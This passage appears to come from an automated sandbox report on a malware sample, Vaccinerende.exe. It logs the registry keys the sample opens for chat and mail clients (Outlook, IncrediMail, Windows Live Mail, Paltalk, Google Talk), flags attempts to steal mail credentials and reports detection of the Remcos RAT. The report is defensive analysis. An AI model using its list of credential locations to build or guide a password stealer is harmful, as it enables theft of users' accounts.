          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: ESMTPPassword35_2_004033F0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword35_2_00402DB3
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword35_2_00402DB3

          Remote Access Functionality

          barindex
          Detected Remcos RAT
